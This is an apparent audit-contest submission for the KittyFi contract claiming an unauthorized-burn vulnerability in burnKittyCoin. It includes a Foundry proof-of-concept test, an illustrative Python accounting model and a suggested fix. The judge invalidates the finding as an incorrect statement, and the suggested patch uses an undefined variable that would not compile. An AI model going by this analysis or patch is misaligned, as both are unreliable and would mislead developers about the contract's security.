First Flight #21: KittyFi

Submission Details
Severity: high
Invalid

H-01 : Unauthorized Cross-Account Balance Manipulation and Token Burn Mismatch in `KittyPool::burnKittyCoin`

Summary

The KittyPool smart contract contains a critical vulnerability. An attacker can exploit the `KittyPool::burnKittyCoin` function to manipulate other users' account balances.

Vulnerability Details

The `KittyPool` contract contains a critical vulnerability in its `KittyPool::burnKittyCoin` function that allows unauthorized manipulation of user balances. The function lets any caller reduce another user's internal `kittyCoinMeownted` balance without permission, while burning the tokens from the caller's own account instead of from the account whose balance was reduced. This creates a mismatch between the contract's internal accounting and the actual token balances, potentially leading to financial losses and system-wide inconsistencies.

```solidity
function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
@>  kittyCoinMeownted[_onBehalfOf] -= _ameownt;
    i_kittyCoin.burn(msg.sender, _ameownt);
}
```

Add this test case to your `kittyFi.test.sol` file (it relies on the `user`, `bob`, `weth`, `wethVault`, `kittyPool` and `kittyCoin` fixtures set up in that file):

```solidity
function test_UnauthorizedBurning() public {
    uint256 toDeposit = 5 ether;
    uint256 amountToMint = 20e18; // 20 KittyCoin

    // User deposits collateral and mints KittyCoin
    vm.startPrank(user);
    IERC20(weth).approve(address(wethVault), toDeposit);
    kittyPool.depawsitMeowllateral(address(weth), toDeposit);
    kittyPool.meowintKittyCoin(amountToMint);
    vm.stopPrank();

    // Bob deposits collateral and mints KittyCoin
    vm.startPrank(bob);
    IERC20(weth).approve(address(wethVault), toDeposit);
    kittyPool.depawsitMeowllateral(address(weth), toDeposit);
    kittyPool.meowintKittyCoin(amountToMint);
    vm.stopPrank();

    // Record initial balances
    uint256 userInitialMeownted = kittyPool.getKittyCoinMeownted(user);
    uint256 bobInitialMeownted = kittyPool.getKittyCoinMeownted(bob);
    uint256 userInitialBalance = kittyCoin.balanceOf(user);
    uint256 bobInitialBalance = kittyCoin.balanceOf(bob);

    // Bob attempts to burn User's KittyCoin
    uint256 toBurn = 15e18;
    vm.prank(bob);
    kittyPool.burnKittyCoin(user, toBurn);

    // Record final balances
    uint256 userFinalMeownted = kittyPool.getKittyCoinMeownted(user);
    uint256 bobFinalMeownted = kittyPool.getKittyCoinMeownted(bob);
    uint256 userFinalBalance = kittyCoin.balanceOf(user);
    uint256 bobFinalBalance = kittyCoin.balanceOf(bob);

    // Assertions to demonstrate the vulnerability
    assertEq(
        userFinalMeownted,
        userInitialMeownted - toBurn,
        "User's meownted balance should decrease"
    );
    assertEq(
        bobFinalMeownted,
        bobInitialMeownted,
        "Bob's meownted balance should not change"
    );
    assertEq(
        userFinalBalance,
        userInitialBalance,
        "User's actual token balance should not change"
    );
    assertEq(
        bobFinalBalance,
        bobInitialBalance - toBurn,
        "Bob's actual token balance should decrease"
    );

    // Additional assertion to show the mismatch
    assertNotEq(
        userFinalMeownted,
        userFinalBalance,
        "User's meownted balance should not match actual balance"
    );
}
```

Impact

  1. Unauthorized Balance Manipulation:

    • Any user can call `KittyPool::burnKittyCoin` with any address as the `_onBehalfOf` parameter.

    • This reduces the `kittyCoinMeownted` balance of the specified address without any authorization check.

  2. Incorrect Token Burning:

    • While the function reduces the `kittyCoinMeownted` balance of the `_onBehalfOf` address, it burns tokens from `msg.sender`'s balance.

    • This creates a mismatch between the internal accounting (`kittyCoinMeownted`) and the actual token balances.
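The accounting effect described in the Vulnerability Details and Impact sections, and the effect of the msg.sender-only variant proposed under Recommendations, can be replayed off-chain. The model below is an added example, not code from the KittyFi repository or from this report; it assumes the ledger mapping is named `kittyCoinMeownted` (as in the snippet above), models only the mint, burn and balanceOf pieces of the ERC-20 that `burnKittyCoin` touches, and omits the collateral checks of `meowintKittyCoin` because they do not affect the balances being compared. It replays the scenario of the Foundry test (user and bob each mint 20 KittyCoin, bob calls `burnKittyCoin(user, 15e18)`) and reports, for each variant, which accounts end up with a ledger entry that differs from their token balance, plus whether the global "sum of ledger == totalSupply" invariant still holds.

```python
"""Constructed accounting model of KittyPool::burnKittyCoin (not the project's code)."""

WAD = 10**18


class KittyCoinModel:
    """The slice of an ERC-20 that burnKittyCoin relies on: mint, burn, balanceOf."""

    def __init__(self) -> None:
        self.balances: dict[str, int] = {}

    def mint(self, to: str, amount: int) -> None:
        self.balances[to] = self.balances.get(to, 0) + amount

    def burn(self, owner: str, amount: int) -> None:
        # An ERC-20 burn reverts when the owner holds fewer tokens than requested.
        if self.balances.get(owner, 0) < amount:
            raise ValueError("burn amount exceeds balance")
        self.balances[owner] -= amount

    def balance_of(self, who: str) -> int:
        return self.balances.get(who, 0)

    def total_supply(self) -> int:
        return sum(self.balances.values())


class KittyPoolModel:
    """Keeps the per-account minted ledger (kittyCoinMeownted) next to the token."""

    def __init__(self, reported_variant: bool) -> None:
        self.coin = KittyCoinModel()
        self.kitty_coin_meownted: dict[str, int] = {}
        self.reported_variant = reported_variant

    def meowint_kitty_coin(self, caller: str, amount: int) -> None:
        # Collateral checks are omitted: they do not change the accounting below.
        self.kitty_coin_meownted[caller] = self.kitty_coin_meownted.get(caller, 0) + amount
        self.coin.mint(caller, amount)

    def burn_kitty_coin(self, caller: str, on_behalf_of: str, amount: int) -> None:
        # Reported variant: debit _onBehalfOf's ledger entry, burn the caller's tokens.
        # Recommended variant: ignore _onBehalfOf and debit the caller's own entry.
        debited = on_behalf_of if self.reported_variant else caller
        # Check both preconditions before mutating, so a failing call leaves no
        # partial state (a reverted transaction changes nothing on-chain).
        if self.kitty_coin_meownted.get(debited, 0) < amount:
            raise ValueError("arithmetic underflow in kittyCoinMeownted")
        if self.coin.balance_of(caller) < amount:
            raise ValueError("burn amount exceeds balance")
        self.kitty_coin_meownted[debited] -= amount
        self.coin.burn(caller, amount)

    def ledger_mismatches(self) -> dict[str, tuple[int, int]]:
        """Accounts whose ledger entry no longer equals their token balance."""
        accounts = set(self.kitty_coin_meownted) | set(self.coin.balances)
        return {
            a: (self.kitty_coin_meownted.get(a, 0), self.coin.balance_of(a))
            for a in sorted(accounts)
            if self.kitty_coin_meownted.get(a, 0) != self.coin.balance_of(a)
        }

    def global_invariant_holds(self) -> bool:
        """Sum of all ledger entries equals the token's total supply."""
        return sum(self.kitty_coin_meownted.values()) == self.coin.total_supply()


def run_scenario(reported_variant: bool) -> dict:
    """Replay the page's test: user and bob each mint 20 KittyCoin, then bob
    calls burnKittyCoin(user, 15 KittyCoin). Returns the resulting state."""
    pool = KittyPoolModel(reported_variant)
    pool.meowint_kitty_coin("user", 20 * WAD)
    pool.meowint_kitty_coin("bob", 20 * WAD)
    pool.burn_kitty_coin("bob", "user", 15 * WAD)
    return {
        "ledger": dict(pool.kitty_coin_meownted),
        "balances": dict(pool.coin.balances),
        "mismatches": pool.ledger_mismatches(),
        "global_ok": pool.global_invariant_holds(),
    }


if __name__ == "__main__":
    for variant, label in ((True, "as reported"), (False, "recommended")):
        print(label, run_scenario(variant))
```

Running it shows the two checks a reviewer would want side by side: in the reported variant the global invariant still holds (25 KittyCoin on the ledger, 25 in supply) while both user and bob have ledger entries that no longer match their balances; in the recommended variant every account's ledger entry equals its balance.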

Tools Used

Manual Review

Recommendations

Make these changes to your `KittyPool::burnKittyCoin` function:

- function burnKittyCoin(address _onBehalfOf, uint256 _ameownt) external {
+ function burnKittyCoin(uint256 _ameownt) external {
- kittyCoinMeownted[_onBehalfOf] -= _ameownt;
+ inMeownted[msg.sender] -= _ameownt;
i_kittyCoin.burn(msg.sender, _ameownt);
}
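Review bot: the added line `+ inMeownted[msg.sender] -= _ameownt;` uses a storage variable name that appears nowhere else on this page; the removed line and the vulnerable snippet both use `kittyCoinMeownted`, and the test reads it back through `getKittyCoinMeownted`. As written the replacement would not compile against the contract shown. Suggest `kittyCoinMeownted[msg.sender] -= _ameownt;`. Also note that dropping the `_onBehalfOf` parameter changes the external signature, so any existing caller or test that invokes `burnKittyCoin(address, uint256)` (including the test case above) must be updated alongside the fix.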

Updates

Lead Judging Commences

shikhar229169 Lead Judge 11 months ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
